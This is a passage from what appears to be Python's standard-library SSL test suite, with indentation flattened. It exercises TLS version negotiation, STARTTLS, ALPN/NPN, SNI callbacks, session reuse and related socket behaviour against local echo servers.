try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# disable all but TLS 1.3
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], [
'TLS13-AES-256-GCM-SHA384',
'TLS13-CHACHA20-POLY1305-SHA256',
'TLS13-AES-128-GCM-SHA256',
])
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not alg1 in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLS 1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests, ThreadedTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
